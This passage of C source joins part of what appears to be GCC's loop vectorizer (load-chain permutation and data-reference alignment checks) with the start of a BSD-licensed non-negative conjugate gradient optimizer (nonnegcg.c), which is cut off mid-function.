vect_permute_load_chain (vec<tree> dr_chain,
unsigned int length,
gimple stmt,
gimple_stmt_iterator *gsi,
vec<tree> *result_chain)
{
tree data_ref, first_vect, second_vect;
tree perm_mask_even, perm_mask_odd;
tree perm3_mask_low, perm3_mask_high;
gimple perm_stmt;
tree vectype = STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt));
unsigned int i, j, log_length = exact_log2 (length);
unsigned nelt = TYPE_VECTOR_SUBPARTS (vectype);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
result_chain->quick_grow (length);
memcpy (result_chain->address (), dr_chain.address (),
length * sizeof (tree));
if (length == 3)
{
unsigned int k;
for (k = 0; k < 3; k++)
{
for (i = 0; i < nelt; i++)
if (3 * i + k < 2 * nelt)
sel[i] = 3 * i + k;
else
sel[i] = 0;
perm3_mask_low = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0, j = 0; i < nelt; i++)
if (3 * i + k < 2 * nelt)
sel[i] = i;
else
sel[i] = nelt + ((nelt + k) % 3) + 3 * (j++);
perm3_mask_high = vect_gen_perm_mask_checked (vectype, sel);
first_vect = dr_chain[0];
second_vect = dr_chain[1];
/* Create interleaving stmt (low part of):
low = VEC_PERM_EXPR <first_vect, second_vect2, {k, 3 + k, 6 + k,
...}> */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3_low");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, first_vect,
second_vect, perm3_mask_low);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
/* Create interleaving stmt (high part of):
high = VEC_PERM_EXPR <first_vect, second_vect2, {k, 3 + k, 6 + k,
...}> */
first_vect = data_ref;
second_vect = dr_chain[2];
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3_high");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, first_vect,
second_vect, perm3_mask_high);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[k] = data_ref;
}
}
else
{
/* If length is not equal to 3 then only power of 2 is supported. */
gcc_assert (exact_log2 (length) != -1);
for (i = 0; i < nelt; ++i)
sel[i] = i * 2;
perm_mask_even = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < nelt; ++i)
sel[i] = i * 2 + 1;
perm_mask_odd = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < log_length; i++)
{
for (j = 0; j < length; j += 2)
{
first_vect = dr_chain[j];
second_vect = dr_chain[j+1];
/* data_ref = permute_even (first_data_ref, second_data_ref); */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_perm_even");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
first_vect, second_vect,
perm_mask_even);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j/2] = data_ref;
/* data_ref = permute_odd (first_data_ref, second_data_ref); */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_perm_odd");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
first_vect, second_vect,
perm_mask_odd);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j/2+length/2] = data_ref;
}
memcpy (dr_chain.address (), result_chain->address (),
length * sizeof (tree));
}
}
}
/* Function vect_shift_permute_load_chain.
Given a chain of loads in DR_CHAIN of LENGTH 2 or 3, generate
sequence of stmts to reorder the input data accordingly.
Return the final references for loads in RESULT_CHAIN.
Return true if successed, false otherwise.
E.g., LENGTH is 3 and the scalar type is short, i.e., VF is 8.
The input is 3 vectors each containing 8 elements. We assign a
number to each element, the input sequence is:
1st vec: 0 1 2 3 4 5 6 7
2nd vec: 8 9 10 11 12 13 14 15
3rd vec: 16 17 18 19 20 21 22 23
The output sequence should be:
1st vec: 0 3 6 9 12 15 18 21
2nd vec: 1 4 7 10 13 16 19 22
3rd vec: 2 5 8 11 14 17 20 23
We use 3 shuffle instructions and 3 * 3 - 1 shifts to create such output.
First we shuffle all 3 vectors to get correct elements order:
1st vec: ( 0 3 6) ( 1 4 7) ( 2 5)
2nd vec: ( 8 11 14) ( 9 12 15) (10 13)
3rd vec: (16 19 22) (17 20 23) (18 21)
Next we unite and shift vector 3 times:
1st step:
shift right by 6 the concatenation of:
"1st vec" and "2nd vec"
( 0 3 6) ( 1 4 7) |( 2 5) _ ( 8 11 14) ( 9 12 15)| (10 13)
"2nd vec" and "3rd vec"
( 8 11 14) ( 9 12 15) |(10 13) _ (16 19 22) (17 20 23)| (18 21)
"3rd vec" and "1st vec"
(16 19 22) (17 20 23) |(18 21) _ ( 0 3 6) ( 1 4 7)| ( 2 5)
| New vectors |
So that now new vectors are:
1st vec: ( 2 5) ( 8 11 14) ( 9 12 15)
2nd vec: (10 13) (16 19 22) (17 20 23)
3rd vec: (18 21) ( 0 3 6) ( 1 4 7)
2nd step:
shift right by 5 the concatenation of:
"1st vec" and "3rd vec"
( 2 5) ( 8 11 14) |( 9 12 15) _ (18 21) ( 0 3 6)| ( 1 4 7)
"2nd vec" and "1st vec"
(10 13) (16 19 22) |(17 20 23) _ ( 2 5) ( 8 11 14)| ( 9 12 15)
"3rd vec" and "2nd vec"
(18 21) ( 0 3 6) |( 1 4 7) _ (10 13) (16 19 22)| (17 20 23)
| New vectors |
So that now new vectors are:
1st vec: ( 9 12 15) (18 21) ( 0 3 6)
2nd vec: (17 20 23) ( 2 5) ( 8 11 14)
3rd vec: ( 1 4 7) (10 13) (16 19 22) READY
3rd step:
shift right by 5 the concatenation of:
"1st vec" and "1st vec"
( 9 12 15) (18 21) |( 0 3 6) _ ( 9 12 15) (18 21)| ( 0 3 6)
shift right by 3 the concatenation of:
"2nd vec" and "2nd vec"
(17 20 23) |( 2 5) ( 8 11 14) _ (17 20 23)| ( 2 5) ( 8 11 14)
| New vectors |
So that now all vectors are READY:
1st vec: ( 0 3 6) ( 9 12 15) (18 21)
2nd vec: ( 2 5) ( 8 11 14) (17 20 23)
3rd vec: ( 1 4 7) (10 13) (16 19 22)
This algorithm is faster than one in vect_permute_load_chain if:
1. "shift of a concatination" is faster than general permutation.
This is usually so.
2. The TARGET machine can't execute vector instructions in parallel.
This is because each step of the algorithm depends on previous.
The algorithm in vect_permute_load_chain is much more parallel.
The algorithm is applicable only for LOAD CHAIN LENGTH less than VF.
*/
static bool
vect_shift_permute_load_chain (vec<tree> dr_chain,
unsigned int length,
gimple stmt,
gimple_stmt_iterator *gsi,
vec<tree> *result_chain)
{
tree vect[3], vect_shift[3], data_ref, first_vect, second_vect;
tree perm2_mask1, perm2_mask2, perm3_mask;
tree select_mask, shift1_mask, shift2_mask, shift3_mask, shift4_mask;
gimple perm_stmt;
tree vectype = STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt));
unsigned int i;
unsigned nelt = TYPE_VECTOR_SUBPARTS (vectype);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
result_chain->quick_grow (length);
memcpy (result_chain->address (), dr_chain.address (),
length * sizeof (tree));
if (exact_log2 (length) != -1 && LOOP_VINFO_VECT_FACTOR (loop_vinfo) > 4)
{
unsigned int j, log_length = exact_log2 (length);
for (i = 0; i < nelt / 2; ++i)
sel[i] = i * 2;
for (i = 0; i < nelt / 2; ++i)
sel[nelt / 2 + i] = i * 2 + 1;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 2 fields structure is not \
supported by target\n");
return false;
}
perm2_mask1 = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < nelt / 2; ++i)
sel[i] = i * 2 + 1;
for (i = 0; i < nelt / 2; ++i)
sel[nelt / 2 + i] = i * 2;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 2 fields structure is not \
supported by target\n");
return false;
}
perm2_mask2 = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {4 5 6 7 8 9 10 11}. */
for (i = 0; i < nelt; i++)
sel[i] = nelt / 2 + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift1_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to select vector from 2.
For vector length 8 it is {0 1 2 3 12 13 14 15}. */
for (i = 0; i < nelt / 2; i++)
sel[i] = i;
for (i = nelt / 2; i < nelt; i++)
sel[i] = nelt + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"select is not supported by target\n");
return false;
}
select_mask = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < log_length; i++)
{
for (j = 0; j < length; j += 2)
{
first_vect = dr_chain[j];
second_vect = dr_chain[j + 1];
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle2");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
first_vect, first_vect,
perm2_mask1);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect[0] = data_ref;
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle2");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
second_vect, second_vect,
perm2_mask2);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect[1] = data_ref;
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
vect[0], vect[1], shift1_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j/2 + length/2] = data_ref;
data_ref = make_temp_ssa_name (vectype, NULL, "vect_select");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
vect[0], vect[1], select_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j/2] = data_ref;
}
memcpy (dr_chain.address (), result_chain->address (),
length * sizeof (tree));
}
return true;
}
if (length == 3 && LOOP_VINFO_VECT_FACTOR (loop_vinfo) > 2)
{
unsigned int k = 0, l = 0;
/* Generating permutation constant to get all elements in rigth order.
For vector length 8 it is {0 3 6 1 4 7 2 5}. */
for (i = 0; i < nelt; i++)
{
if (3 * k + (l % 3) >= nelt)
{
k = 0;
l += (3 - (nelt % 3));
}
sel[i] = 3 * k + (l % 3);
k++;
}
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 3 fields structure is not \
supported by target\n");
return false;
}
perm3_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {6 7 8 9 10 11 12 13}. */
for (i = 0; i < nelt; i++)
sel[i] = 2 * (nelt / 3) + (nelt % 3) + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift1_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {5 6 7 8 9 10 11 12}. */
for (i = 0; i < nelt; i++)
sel[i] = 2 * (nelt / 3) + 1 + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift2_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {3 4 5 6 7 8 9 10}. */
for (i = 0; i < nelt; i++)
sel[i] = (nelt / 3) + (nelt % 3) / 2 + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift3_mask = vect_gen_perm_mask_checked (vectype, sel);
/* Generating permutation constant to shift all elements.
For vector length 8 it is {5 6 7 8 9 10 11 12}. */
for (i = 0; i < nelt; i++)
sel[i] = 2 * (nelt / 3) + (nelt % 3) / 2 + i;
if (!can_vec_perm_p (TYPE_MODE (vectype), false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shift permutation is not supported by target\n");
return false;
}
shift4_mask = vect_gen_perm_mask_checked (vectype, sel);
for (k = 0; k < 3; k++)
{
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
dr_chain[k], dr_chain[k],
perm3_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect[k] = data_ref;
}
for (k = 0; k < 3; k++)
{
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift1");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
vect[k % 3], vect[(k + 1) % 3],
shift1_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect_shift[k] = data_ref;
}
for (k = 0; k < 3; k++)
{
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift2");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR,
vect_shift[(4 - k) % 3],
vect_shift[(3 - k) % 3],
shift2_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect[k] = data_ref;
}
(*result_chain)[3 - (nelt % 3)] = vect[2];
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift3");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, vect[0],
vect[0], shift3_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[nelt % 3] = data_ref;
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shift4");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, vect[1],
vect[1], shift4_mask);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[0] = data_ref;
return true;
}
return false;
}
/* Function vect_transform_grouped_load.
Given a chain of input interleaved data-refs (in DR_CHAIN), build statements
to perform their permutation and ascribe the result vectorized statements to
the scalar statements.
*/
void
vect_transform_grouped_load (gimple stmt, vec<tree> dr_chain, int size,
gimple_stmt_iterator *gsi)
{
machine_mode mode;
vec<tree> result_chain = vNULL;
/* DR_CHAIN contains input data-refs that are a part of the interleaving.
RESULT_CHAIN is the output of vect_permute_load_chain, it contains permuted
vectors, that are ready for vector computation. */
result_chain.create (size);
/* If reassociation width for vector type is 2 or greater target machine can
execute 2 or more vector instructions in parallel. Otherwise try to
get chain for loads group using vect_shift_permute_load_chain. */
mode = TYPE_MODE (STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt)));
if (targetm.sched.reassociation_width (VEC_PERM_EXPR, mode) > 1
|| exact_log2 (size) != -1
|| !vect_shift_permute_load_chain (dr_chain, size, stmt,
gsi, &result_chain))
vect_permute_load_chain (dr_chain, size, stmt, gsi, &result_chain);
vect_record_grouped_load_vectors (stmt, result_chain);
result_chain.release ();
}
/* RESULT_CHAIN contains the output of a group of grouped loads that were
generated as part of the vectorization of STMT. Assign the statement
for each vector to the associated scalar statement. */
void
vect_record_grouped_load_vectors (gimple stmt, vec<tree> result_chain)
{
gimple first_stmt = GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt));
gimple next_stmt, new_stmt;
unsigned int i, gap_count;
tree tmp_data_ref;
/* Put a permuted data-ref in the VECTORIZED_STMT field.
Since we scan the chain starting from it's first node, their order
corresponds the order of data-refs in RESULT_CHAIN. */
next_stmt = first_stmt;
gap_count = 1;
FOR_EACH_VEC_ELT (result_chain, i, tmp_data_ref)
{
if (!next_stmt)
break;
/* Skip the gaps. Loads created for the gaps will be removed by dead
code elimination pass later. No need to check for the first stmt in
the group, since it always exists.
GROUP_GAP is the number of steps in elements from the previous
access (if there is no gap GROUP_GAP is 1). We skip loads that
correspond to the gaps. */
if (next_stmt != first_stmt
&& gap_count < GROUP_GAP (vinfo_for_stmt (next_stmt)))
{
gap_count++;
continue;
}
while (next_stmt)
{
new_stmt = SSA_NAME_DEF_STMT (tmp_data_ref);
/* We assume that if VEC_STMT is not NULL, this is a case of multiple
copies, and we put the new vector statement in the first available
RELATED_STMT. */
if (!STMT_VINFO_VEC_STMT (vinfo_for_stmt (next_stmt)))
STMT_VINFO_VEC_STMT (vinfo_for_stmt (next_stmt)) = new_stmt;
else
{
if (!GROUP_SAME_DR_STMT (vinfo_for_stmt (next_stmt)))
{
gimple prev_stmt =
STMT_VINFO_VEC_STMT (vinfo_for_stmt (next_stmt));
gimple rel_stmt =
STMT_VINFO_RELATED_STMT (vinfo_for_stmt (prev_stmt));
while (rel_stmt)
{
prev_stmt = rel_stmt;
rel_stmt =
STMT_VINFO_RELATED_STMT (vinfo_for_stmt (rel_stmt));
}
STMT_VINFO_RELATED_STMT (vinfo_for_stmt (prev_stmt)) =
new_stmt;
}
}
next_stmt = GROUP_NEXT_ELEMENT (vinfo_for_stmt (next_stmt));
gap_count = 1;
/* If NEXT_STMT accesses the same DR as the previous statement,
put the same TMP_DATA_REF as its vectorized statement; otherwise
get the next data-ref from RESULT_CHAIN. */
if (!next_stmt || !GROUP_SAME_DR_STMT (vinfo_for_stmt (next_stmt)))
break;
}
}
}
/* Function vect_force_dr_alignment_p.
Returns whether the alignment of a DECL can be forced to be aligned
on ALIGNMENT bit boundary. */
bool
vect_can_force_dr_alignment_p (const_tree decl, unsigned int alignment)
{
if (TREE_CODE (decl) != VAR_DECL)
return false;
if (decl_in_symtab_p (decl)
&& !symtab_node::get (decl)->can_increase_alignment_p ())
return false;
if (TREE_STATIC (decl))
return (alignment <= MAX_OFILE_ALIGNMENT);
else
return (alignment <= MAX_STACK_ALIGNMENT);
}
/* Return whether the data reference DR is supported with respect to its
alignment.
If CHECK_ALIGNED_ACCESSES is TRUE, check if the access is supported even
it is aligned, i.e., check if it is possible to vectorize it with different
alignment. */
enum dr_alignment_support
vect_supportable_dr_alignment (struct data_reference *dr,
bool check_aligned_accesses)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
machine_mode mode = TYPE_MODE (vectype);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct loop *vect_loop = NULL;
bool nested_in_vect_loop = false;
if (aligned_access_p (dr) && !check_aligned_accesses)
return dr_aligned;
/* For now assume all conditional loads/stores support unaligned
access without any special code. */
if (is_gimple_call (stmt)
&& gimple_call_internal_p (stmt)
&& (gimple_call_internal_fn (stmt) == IFN_MASK_LOAD
|| gimple_call_internal_fn (stmt) == IFN_MASK_STORE))
return dr_unaligned_supported;
if (loop_vinfo)
{
vect_loop = LOOP_VINFO_LOOP (loop_vinfo);
nested_in_vect_loop = nested_in_vect_loop_p (vect_loop, stmt);
}
/* Possibly unaligned access. */
/* We can choose between using the implicit realignment scheme (generating
a misaligned_move stmt) and the explicit realignment scheme (generating
aligned loads with a REALIGN_LOAD). There are two variants to the
explicit realignment scheme: optimized, and unoptimized.
We can optimize the realignment only if the step between consecutive
vector loads is equal to the vector size. Since the vector memory
accesses advance in steps of VS (Vector Size) in the vectorized loop, it
is guaranteed that the misalignment amount remains the same throughout the
execution of the vectorized loop. Therefore, we can create the
"realignment token" (the permutation mask that is passed to REALIGN_LOAD)
at the loop preheader.
However, in the case of outer-loop vectorization, when vectorizing a
memory access in the inner-loop nested within the LOOP that is now being
vectorized, while it is guaranteed that the misalignment of the
vectorized memory access will remain the same in different outer-loop
iterations, it is *not* guaranteed that is will remain the same throughout
the execution of the inner-loop. This is because the inner-loop advances
with the original scalar step (and not in steps of VS). If the inner-loop
step happens to be a multiple of VS, then the misalignment remains fixed
and we can use the optimized realignment scheme. For example:
for (i=0; i<N; i++)
for (j=0; j<M; j++)
s += a[i+j];
When vectorizing the i-loop in the above example, the step between
consecutive vector loads is 1, and so the misalignment does not remain
fixed across the execution of the inner-loop, and the realignment cannot
be optimized (as illustrated in the following pseudo vectorized loop):
for (i=0; i<N; i+=4)
for (j=0; j<M; j++){
vs += vp[i+j]; // misalignment of &vp[i+j] is {0,1,2,3,0,1,2,3,...}
// when j is {0,1,2,3,4,5,6,7,...} respectively.
// (assuming that we start from an aligned address).
}
We therefore have to use the unoptimized realignment scheme:
for (i=0; i<N; i+=4)
for (j=k; j<M; j+=4)
vs += vp[i+j]; // misalignment of &vp[i+j] is always k (assuming
// that the misalignment of the initial address is
// 0).
The loop can then be vectorized as follows:
for (k=0; k<4; k++){
rt = get_realignment_token (&vp[k]);
for (i=0; i<N; i+=4){
v1 = vp[i+k];
for (j=k; j<M; j+=4){
v2 = vp[i+j+VS-1];
va = REALIGN_LOAD <v1,v2,rt>;
vs += va;
v1 = v2;
}
}
} */
if (DR_IS_READ (dr))
{
bool is_packed = false;
tree type = (TREE_TYPE (DR_REF (dr)));
if (optab_handler (vec_realign_load_optab, mode) != CODE_FOR_nothing
&& (!targetm.vectorize.builtin_mask_for_load
|| targetm.vectorize.builtin_mask_for_load ()))
{
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
if ((nested_in_vect_loop
&& (TREE_INT_CST_LOW (DR_STEP (dr))
!= GET_MODE_SIZE (TYPE_MODE (vectype))))
|| !loop_vinfo)
return dr_explicit_realign;
else
return dr_explicit_realign_optimized;
}
if (!known_alignment_for_access_p (dr))
is_packed = not_size_aligned (DR_REF (dr));
if ((TYPE_USER_ALIGN (type) && !is_packed)
|| targetm.vectorize.
support_vector_misalignment (mode, type,
DR_MISALIGNMENT (dr), is_packed))
/* Can't software pipeline the loads, but can at least do them. */
return dr_unaligned_supported;
}
else
{
bool is_packed = false;
tree type = (TREE_TYPE (DR_REF (dr)));
if (!known_alignment_for_access_p (dr))
is_packed = not_size_aligned (DR_REF (dr));
if ((TYPE_USER_ALIGN (type) && !is_packed)
|| targetm.vectorize.
support_vector_misalignment (mode, type,
DR_MISALIGNMENT (dr), is_packed))
return dr_unaligned_supported;
}
/* Unsupported. */
return dr_unaligned_unsupported;
}
|
nonnegcg.c | /* Non-negative conjugate gradient optimizer
Minimizes a function subject to non-negativity constraints on all the variables,
using a modified Polak-Ribiere-Polyak conjugate gradient method. Implementation
is based on the paper:
Li, C. (2013). A conjugate gradient type method for the nonnegative constraints optimization problems. Journal of Applied Mathematics, 2013.
BSD 2-Clause License
Copyright (c) 2019, David Cortes
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <math.h>
#include <stdlib.h>
#include <stddef.h>
#include <limits.h>
#ifndef _FOR_R
#include <stdio.h>
#else
#include <R_ext/Print.h>
#define printf Rprintf
#define fprintf(f, message) REprintf(message)
#endif
#ifdef _OPENMP
#include <omp.h>
#endif
#ifdef _FOR_PYTHON
#include "findblas.h"
#elif defined(_FOR_R)
#include <R_ext/BLAS.h>
double cblas_ddot(int n, double *x, int incx, double *y, int incy) { return ddot_(&n, x, &incx, y, &incy); }
void cblas_daxpy(int n, double a, double *x, int incx, double *y, int incy) { daxpy_(&n, &a, x, &incx, y, &incy); }
void cblas_dscal(int n, double alpha, double *x, int incx) { dscal_(&n, &alpha, x, &incx); }
#else
#include "blasfuns.h"
#endif
/* Aliasing for compiler optimizations */
#ifdef __cplusplus
#if defined(__GNUG__) || defined(__GNUC__) || defined(_MSC_VER) || defined(__clang__) || defined(__INTEL_COMPILER)
#define restrict __restrict
#else
#define restrict
#endif
#elif defined(_MSC_VER)
#define restrict __restrict
#elif !defined(__STDC_VERSION__) || (__STDC_VERSION__ < 199901L)
#define restrict
#endif
/* OpenMP < 3.0 (e.g. MSVC as of 2019) does not support parallel for's with unsigned iterators,
and does not support declaring the iterator type in the loop itself */
#ifdef _OPENMP
#if (_OPENMP > 200801) && !defined(_WIN32) && !defined(_WIN64) /* OpenMP < 3.0 */
#define size_t_for size_t
#else
#define size_t_for
#endif
#else
#define size_t_for size_t
#endif
#ifndef isnan
#ifdef _isnan
#define isnan _isnan
#else
#define isnan(x) ( (x) != (x) )
#endif
#endif
#ifndef isinf
#ifdef _finite
#define isinf(x) (!_finite(x))
#else
#define isinf(x) ( (x) >= HUGE_VAL || (x) <= -HUGE_VAL )
#endif
#endif
#define get_curr_ix_rotation(ix, n) ( ((ix) == 0) ? 0 : (n) )
#define incr_ix_rotation(ix) ( ((ix) == 0)? 1 : 0 )
#define square(x) ( (x) * (x) )
#define nonneg(x) ((x) > 0)? (x) : 0
typedef void fun_eval(double x[], int n, double *f, void *data);
typedef void grad_eval(double x[], int n, double grad[], void *data);
typedef void callback(double x[], int n, double f, size_t iter, void *data);
typedef enum cg_result {tol_achieved = 0, stop_maxnfeval = 1, stop_maxiter = 2, out_of_mem = 3} cg_result;
/* Non-negative conjugate gradient optimizer
Minimizes a function subject to non-negativity constraints on all the variables,
using a modified Polak-Rubiere-Polyak conjugate gradient method. Implementation
is based on the paper:
Li, C. (2013). A conjugate gradient type method for the nonnegative constraints optimization problems. Journal of Applied Mathematics, 2013.
x (in, out) : At input, starting point (must be a feasible point). At output, optimal values calculated by the optimizer.
n : Number of variables in the optimization problem
fun_val (out) : Value of the function achieved at the end of the procedure
obj_fun : function that calculates the objective value (must be written into the *f pointer passed to it)
grad_fun : function that calculates the gradient (must be written into the grad[] array passed to it)
cb : callback function to execute at the end of each iteration
data : Extra data to pass to the functions that evaluate objective, gradient, and callback (must be cast to void pointer)
tol : Tolerance for <gradient, direction>
(Recommended: <1e-3)
maxnfeval : Maximum number of function evaluations
(Recommended: >1000)
maxiter : Maximum number of CG iterations to run
(Recommended: >100, but note that steps are always feasible descent directions)
niter (out) : Number of CG iterations performed
nfeval (out) : Number of function evaluations performed
decr_lnsrch : Number by which to decrease the step size after each unsuccessful line search
(Recommended: 0.5)
lnsrch_const : Acceptance parameter for the line search procedure
(Recommended: 0.01)
max_ls : Maximum number of line search trials per iteration
(Recommended: 20)
extra_nonneg_tol: Ensure extra non-negative tolerance by explicitly setting elements that are <=0 to zero at each iteration
(Recommended: 0)
buffer_arr : Array of dimensions (4*n). Will allocate it and then free it if passing NULL.
nthreads : Number of parallel threads to use
verbose : Whether to print convergence messages
*/
int minimize_nonneg_cg(double *restrict x, int n, double *fun_val,
fun_eval *obj_fun, grad_eval *grad_fun, callback *cb, void *data,
double tol, size_t maxnfeval, size_t maxiter, size_t *niter, size_t *nfeval,
double decr_lnsrch, double lnsrch_const, size_t max_ls,
int extra_nonneg_tol, double *buffer_arr, int nthreads, int verbose)
{
double max_step;
double direction_norm_sq;
double grad_prev_norm_sq;
double prod_grad_dir;
double theta;
double beta;
double curr_fun_val;
double new_fun_val;
obj_fun(x, n, &curr_fun_val, data);
*nfeval = 1;
int dealloc_buffer = 0;
int revert_x = 0;
size_t ls;
cg_result return_value = stop_maxiter;
if ( maxiter <= 0 ) { maxiter = INT_MAX;}
if ( maxnfeval <= 0 ) { maxnfeval = INT_MAX;}
#if defined(_OPENMP) && ((_OPENMP < 200801) || defined(_WIN32) || defined(_WIN64)) /* OpenMP < 3.0 */
long i;
long n_szt = n;
#else
size_t n_szt = (size_t) n;
#endif
/* algorithm requires current and previous gradient and search direction, so the index
at which they are written in the array is rotated each iteration to avoid unnecessary copies */
int ix_rotation = 0;
if (buffer_arr == NULL)
{
buffer_arr = (double*) malloc(sizeof(double) * n * 4);
dealloc_buffer = 1;
if (buffer_arr == NULL)
{
fprintf(stderr, "Could not allocate memory for optimization procedure\n");
return out_of_mem;
}
}
double *grad_curr_n_prev = buffer_arr;
double *direction_curr_n_prev = buffer_arr + 2 * n;
double *restrict direction_curr = direction_curr_n_prev;
double *restrict grad_curr = grad_curr_n_prev;
double *restrict direction_prev;
double *restrict grad_prev;
/* set number of BLAS threads */
#if defined(_MKL_H_)
mkl_set_num_threads_local(nthreads);
#elif defined(CBLAS_H)
openblas_set_num_threads(nthreads);
#endif
if (verbose)
{
printf("********************************************\n");
printf("Non-negative Conjugate Gradient Optimization\n\n");
printf("Number of variables to optimize: %d\n", n);
